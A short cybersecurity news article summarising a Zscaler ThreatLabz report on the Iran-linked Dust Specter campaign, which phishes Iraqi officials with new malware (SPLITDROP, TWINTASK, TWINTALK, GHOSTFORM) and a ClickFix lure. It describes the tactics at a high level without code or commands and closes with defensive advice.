# Dust Specter: A New APT Campaign Targeting Iraqi Officials with Sophisticated Malware
In a recent campaign by Iran-linked group Dust Specter, hackers have been targeting Iraqi government officials with phishing emails delivering new malware families. Zscaler ThreatLabz researchers have linked the Iran-nexus group to this operation, which uses sophisticated tactics, techniques, and procedures (TTPs) to evade detection.
The campaign, which began in January 2026, saw Dust Specter impersonate the country's Ministry of Foreign Affairs in phishing messages that delivered previously unseen malware, including SPLITDROP, TWINTASK, TWINTALK, and GHOSTFORM. The attackers used multiple infection chains to deliver the malware, making it challenging for victims to detect and remove the threats. According to Zscaler ThreatLabz, the researchers assess with medium-to-high confidence that an Iran-nexus threat actor conducted this operation.
One attack chain used in the campaign began with a password-protected archive containing a dropper named SPLITDROP, disguised as a WinRAR application. Once executed, it decrypted and deployed two modules: TWINTASK, a worker component that executes PowerShell commands from a local file, and TWINTALK, a command-and-control (C2) orchestrator. TWINTALK communicates with the C2 server using randomized delays, custom URI paths, and JWT tokens to evade detection.
The malware establishes persistence through registry keys and uses DLL sideloading with legitimate software such as VLC and WingetUI. It also opens a fake Google Form posing as a survey from Iraq's Ministry of Foreign Affairs to lure victims. The campaign also used a ClickFix lure disguised as a Cisco Webex meeting page to trick victims into running malicious PowerShell commands that download and schedule malware execution.
ThreatLabz researchers found indicators that generative AI may have been used to develop the TWINTALK and GHOSTFORM malware, including unusual elements such as emojis and Unicode text embedded in functions. The campaign also shares similarities with previous Iranian cyber-espionage operations, suggesting that Dust Specter is a sophisticated APT group.
The use of phishing emails and convincing social engineering lures impersonating Iraq's Ministry of Foreign Affairs highlights the human element of cybersecurity threats. It is essential for organizations to educate their employees on how to identify and report suspicious emails, as well as implement robust security measures to prevent similar attacks in the future.
In conclusion, this campaign demonstrates the growing sophistication of APT groups and the need for organizations to stay vigilant against advanced cyber threats. By understanding the tactics and techniques used by threat actors like Dust Specter, we can better protect ourselves against similar attacks in the future.
Keywords: Dust Specter, Iran-nexus, APT, malware, phishing, cybersecurity, threat actor, ClickFix, generative AI